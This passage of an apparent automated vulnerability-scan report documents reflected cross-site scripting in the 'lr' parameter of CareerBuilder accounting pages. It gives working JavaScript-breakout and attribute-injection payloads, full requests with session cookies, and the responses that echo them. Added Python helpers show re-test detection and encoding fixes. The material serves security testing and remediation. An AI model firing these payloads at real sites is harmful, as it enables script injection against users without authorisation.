Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_CPA.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7a16"%20a%3db%20a8d8796ad8c was submitted in the lr parameter. This input was echoed as e7a16" a=b a8d8796ad8c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_CPA.htm?IPath=OCP&lr=cbcb_mhf48aae7a16"%20a%3db%20a8d8796ad8c HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189156
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL9
Date: Sun, 14 Nov 2010 23:22:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aae7a16" a=b a8d8796ad8c" />
...[SNIP]...

2.35. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Consulting.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Consulting.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54425'-alert(1)-'69e07ba1259 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Consulting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a554425'-alert(1)-'69e07ba1259&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197774
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sun, 14 Nov 2010 23:09:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a554425'-alert(1)-'69e07ba1259&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...
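The scanner's verdict above rests on two observations: the marker string came back byte for byte, and it landed inside a single-quoted JavaScript string (the _registerURL assignment). Note that the lr value in this request already carried a breakout from an earlier probe ('-alert(1)-'9d78db8d0a5), so the response actually contains two string terminations; either alone is sufficient. The Python below is an added example, not the scanner's code and not CareerBuilder's, that re-creates the method for re-testing after a fix: wrap candidate metacharacters in a random marker, find every echo in the response, report which characters came back unencoded, and classify the syntactic context of each echo. The response body is constructed to imitate the two snippets quoted in this report; the report does not say how the attribute context treats angle brackets, so the sample's entity-encoding of < and > there is an assumption, as are all function names.

```python
"""Re-test helper reproducing the scanner's method for the lr reflections in
this report: send a random marker wrapped around candidate metacharacters,
then locate every echo in the response, report which characters came back
unencoded, and classify the syntactic context each echo landed in.  Added
example, not the scanner's or CareerBuilder's code."""
import re
import secrets

PROBE_CHARS = "'\"<>"          # metacharacters whose raw reflection matters


def new_probe():
    """Random prefix/suffix so the echo can be located unambiguously."""
    return secrets.token_hex(3), secrets.token_hex(5)


def build_payload(prefix, suffix, chars=PROBE_CHARS):
    return prefix + chars + suffix


def _open_quote(segment):
    """Quote character still open at the end of segment, or None.  Linear scan
    honouring backslash escapes inside an open string; it does not understand
    comments or regex literals, so treat the answer as a strong hint."""
    quote, i = None, 0
    while i < len(segment):
        ch = segment[i]
        if quote is not None and ch == "\\":
            i += 2
            continue
        if quote is None and ch in "'\"":
            quote = ch
        elif ch == quote:
            quote = None
        i += 1
    return quote


def reflection_context(body, offset):
    """Classify body[offset] as one of: js_string_single, js_string_double,
    script, attr_double, attr_single, tag, text."""
    before = body[:offset]
    lower = before.lower()
    if lower.rfind("<script") > lower.rfind("</script"):
        gt = before.find(">", lower.rfind("<script"))
        code = before[gt + 1:] if gt != -1 else ""
        quote = _open_quote(code)
        return {"'": "js_string_single", '"': "js_string_double"}.get(quote, "script")
    if before.rfind("<") > before.rfind(">"):
        quote = _open_quote(before[before.rfind("<"):])
        return {'"': "attr_double", "'": "attr_single"}.get(quote, "tag")
    return "text"


def analyse(body, prefix, suffix, chars=PROBE_CHARS):
    """One dict per echo: offset, context, and the probe chars reflected raw."""
    pattern = re.compile(re.escape(prefix) + "(.*?)" + re.escape(suffix), re.S)
    results = []
    for m in pattern.finditer(body):
        echoed = m.group(1)
        results.append({"offset": m.start(),
                        "context": reflection_context(body, m.start()),
                        "raw": "".join(c for c in chars if c in echoed)})
    return results


# Constructed sample response imitating the two snippets quoted in the report.
# The marker values come from finding 2.35.  The JS string echoes every probe
# character raw, as the report states; the attribute echoes the quotes raw but
# entity-encodes < and > (an assumption: the report does not test those there).
PREFIX, SUFFIX = "54425", "69e07ba1259"
SAMPLE_RESPONSE = (
    "<html><head><title>Miami</title>\n"
    '<script type="text/javascript">\n'
    "CB.AJAX.Login._introHTML = 'The feature you requested is only available to members.';\n"
    "CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa"
    + build_payload(PREFIX, SUFFIX) + "&ff=21';\n"
    'CB.AJAX.Login._siteDownHTML = "Login is currently unavailable.";\n'
    "</script></head><body>\n"
    '<form><input name="lr" type="hidden" value="cbcb_mhf48aa'
    + PREFIX + "'\"&lt;&gt;" + SUFFIX + '" /></form>\n'
    "</body></html>"
)

if __name__ == "__main__":
    for hit in analyse(SAMPLE_RESPONSE, PREFIX, SUFFIX):
        print(hit)
```

Against the sample the first echo is reported as js_string_single with all four probe characters raw, the second as attr_double with only the quotes raw, which is exactly the split between the "Certain" and "Firm" findings in this report. For a live re-test, substitute the fetched response body for SAMPLE_RESPONSE and the prefix/suffix from new_probe() for the fixed markers.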

2.36. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Consulting.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Consulting.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42478"%20a%3db%203a96f68a939 was submitted in the lr parameter. This input was echoed as 42478" a=b 3a96f68a939 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. The reflection point in the response below is a hidden <input>, which is not rendered and receives no mouse or focus events, so an injected event-handler attribute would not fire on its own; escalation depends on whether the application also reflects angle brackets unencoded (not established here), which would allow the tag to be closed and a new one opened. Manually examine the application's behaviour and identify any input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Consulting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a542478"%20a%3db%203a96f68a939&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197180
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR15
Date: Sun, 14 Nov 2010 23:06:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a542478" a=b 3a96f68a939" />
...[SNIP]...
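Findings 2.35 and 2.36 are the same parameter landing in two different syntactic contexts, and each context needs its own encoding. The Python below is an added example (not CareerBuilder's code) that reproduces the two reflection points with templates imitating the response snippets, renders them first by raw concatenation and then with context-appropriate encoding, and checks both outputs against the exact values echoed in the two findings. The template layout, the function names and the check logic are this example's own assumptions; the encoding it applies (percent-encoding of the query value, a JSON-derived JavaScript string literal with </ escaped, entity encoding of the attribute value) is standard practice rather than anything the report prescribes.

```python
"""Vulnerable and hardened renderings of the two reflection points in this
report: the single-quoted JavaScript string assigned to
CB.AJAX.Login._registerURL (2.35) and the double-quoted value attribute of
the hidden <input name="lr"> (2.36).  Added example, not CareerBuilder's
code; the templates imitate the response snippets quoted in the report."""
import html
import json
import urllib.parse
from html.parser import HTMLParser

# Values echoed in the two findings, scanner markers included.
JS_PAYLOAD = "cbcb_mhf48aa54425'-alert(1)-'69e07ba1259"
ATTR_PAYLOAD = 'cbcb_mhf48aa42478" a=b 3a96f68a939'
REGISTER_URL = "https://www.careerbuilder.com/Share/Register.aspx?lr="


def render_vulnerable(lr):
    """Raw concatenation into both contexts, as the responses show."""
    script = "CB.AJAX.Login._registerURL = '" + REGISTER_URL + lr + "&ff=21';"
    field = '<input name="lr" type="hidden" value="' + lr + '" />'
    return "<script>\n" + script + "\n</script>\n" + field


def js_string_literal(value):
    """Serialise value as a JavaScript string literal that can neither end
    itself nor the enclosing <script>.  json.dumps escapes quotes, backslashes
    and control characters and (ensure_ascii=True by default) writes non-ASCII
    such as the U+2028/2029 line terminators as \\uXXXX; the remaining hazard
    is '</', which closes the script element even inside a string."""
    return json.dumps(value).replace("</", "<\\/")


def render_hardened(lr):
    """One encoding per layer: percent-encode lr as a query value, emit the
    whole URL as a JS literal, entity-encode the attribute value."""
    url = REGISTER_URL + urllib.parse.quote(lr, safe="") + "&ff=21"
    script = "CB.AJAX.Login._registerURL = " + js_string_literal(url) + ";"
    field = ('<input name="lr" type="hidden" value="'
             + html.escape(lr, quote=True) + '" />')
    return "<script>\n" + script + "\n</script>\n" + field


def js_literal_is_intact(doc):
    """True when the _registerURL statement holds a single string literal:
    exactly two unescaped quotes of the opening kind, and the literal is what
    the statement ends with."""
    stmt = doc.split("_registerURL = ", 1)[1].split("\n", 1)[0]
    quote, count, i = stmt[0], 0, 0
    while i < len(stmt):
        if stmt[i] == "\\":
            i += 2                      # skip the escaped character
            continue
        if stmt[i] == quote:
            count += 1
        i += 1
    return count == 2 and stmt.endswith(quote + ";")


class _FirstInput(HTMLParser):
    """Records the attribute list of the first <input> encountered."""
    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = attrs


def attribute_is_intact(doc, lr):
    """True when the hidden input carries only name/type/value and a browser
    would read back exactly lr (the parser decodes entities, as browsers do)."""
    parser = _FirstInput()
    parser.feed(doc)
    parser.close()
    if parser.attrs is None:
        return False
    names = [name for name, _ in parser.attrs]
    return names == ["name", "type", "value"] and dict(parser.attrs)["value"] == lr


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(label, "js literal intact:", js_literal_is_intact(render(JS_PAYLOAD)),
              "| attribute intact:", attribute_is_intact(render(ATTR_PAYLOAD), ATTR_PAYLOAD))
```

Run as-is, both checks fail for the vulnerable renderer and pass for the hardened one. The two check functions are deliberately independent of the renderer, so the same checks can be pointed at a live response body once a fix has been deployed; the percent-encoding step alone already removes the quote from the URL, and the JS-literal serialisation is the second layer that protects any other value emitted into the script block.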

2.37. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CostAccounting.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_CostAccounting.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a9d2"%20a%3db%20c76e3eed769 was submitted in the lr parameter. This input was echoed as 7a9d2" a=b c76e3eed769 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. The reflection point in the response below is a hidden <input>, which is not rendered and receives no mouse or focus events, so an injected event-handler attribute would not fire on its own; escalation depends on whether the application also reflects angle brackets unencoded (not established here), which would allow the tag to be closed and a new one opened. Manually examine the application's behaviour and identify any input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_CostAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a57a9d2"%20a%3db%20c76e3eed769&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196950
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL20
Date: Sun, 14 Nov 2010 23:22:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a57a9d2" a=b c76e3eed769" />
...[SNIP]...

2.38. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CostAccounting.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_CostAccounting.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c60b1'-alert(1)-'078d4fa7612 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent: HTML entity encoding does not apply inside a script block, and a single unescaped quote terminates the string literal, as the response below shows. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be emitted as a proper JavaScript string literal (quotes, backslashes, line terminators and the sequence </ escaped as \xHH or \uHHHH sequences), or written into an HTML-encoded attribute and read from the DOM. Since lr is also a query-string component of the generated URL, it should additionally be percent-encoded before being concatenated into that URL.

Request

GET /ag.ic/Florida_Miami_CostAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c60b1'-alert(1)-'078d4fa7612&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197631
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL35
Date: Sun, 14 Nov 2010 23:23:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c60b1'-alert(1)-'078d4fa7612&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.39. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Executive.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Executive.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3df9'-alert(1)-'57eee3b2f1c was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent: HTML entity encoding does not apply inside a script block, and a single unescaped quote terminates the string literal, as the response below shows. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be emitted as a proper JavaScript string literal (quotes, backslashes, line terminators and the sequence </ escaped as \xHH or \uHHHH sequences), or written into an HTML-encoded attribute and read from the DOM. Since lr is also a query-string component of the generated URL, it should additionally be percent-encoded before being concatenated into that URL.

Request

GET /ag.ic/Florida_Miami_Executive.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5a3df9'-alert(1)-'57eee3b2f1c&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197519
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL11
Date: Sun, 14 Nov 2010 23:23:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5a3df9'-alert(1)-'57eee3b2f1c&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.40. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Executive.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Executive.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c20e1"%20a%3db%2003b3bbde943 was submitted in the lr parameter. This input was echoed as c20e1" a=b 03b3bbde943 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. The reflection point in the response below is a hidden <input>, which is not rendered and receives no mouse or focus events, so an injected event-handler attribute would not fire on its own; escalation depends on whether the application also reflects angle brackets unencoded (not established here), which would allow the tag to be closed and a new one opened. Manually examine the application's behaviour and identify any input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Executive.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c20e1"%20a%3db%2003b3bbde943&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196781
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL24
Date: Sun, 14 Nov 2010 23:22:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c20e1" a=b 03b3bbde943" />
...[SNIP]...

2.41. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Management.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Management.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56b3d'-alert(1)-'9ff60971f08 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent: HTML entity encoding does not apply inside a script block, and a single unescaped quote terminates the string literal, as the response below shows. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, the value must be emitted as a proper JavaScript string literal (quotes, backslashes, line terminators and the sequence </ escaped as \xHH or \uHHHH sequences), or written into an HTML-encoded attribute and read from the DOM. Since lr is also a query-string component of the generated URL, it should additionally be percent-encoded before being concatenated into that URL.

Request

GET /ag.ic/Florida_Miami_Management.htm?IPath=OCP&lr=cbcb_mhf48aa56b3d'-alert(1)-'9ff60971f08 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190195
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL27
Date: Sun, 14 Nov 2010 23:24:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa56b3d'-alert(1)-'9ff60971f08&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.42. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Management.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Management.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69413"%20a%3db%20317ba7aab6a was submitted in the lr parameter. This input was echoed as 69413" a=b 317ba7aab6a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt to identify a full proof-of-concept attack for injecting arbitrary JavaScript was not successful. The reflection point in the response below is a hidden <input>, which is not rendered and receives no mouse or focus events, so an injected event-handler attribute would not fire on its own; escalation depends on whether the application also reflects angle brackets unencoded (not established here), which would allow the tag to be closed and a new one opened. Manually examine the application's behaviour and identify any input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Management.htm?IPath=OCP&lr=cbcb_mhf48aa69413"%20a%3db%20317ba7aab6a HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189577
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL25
Date: Sun, 14 Nov 2010 23:23:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
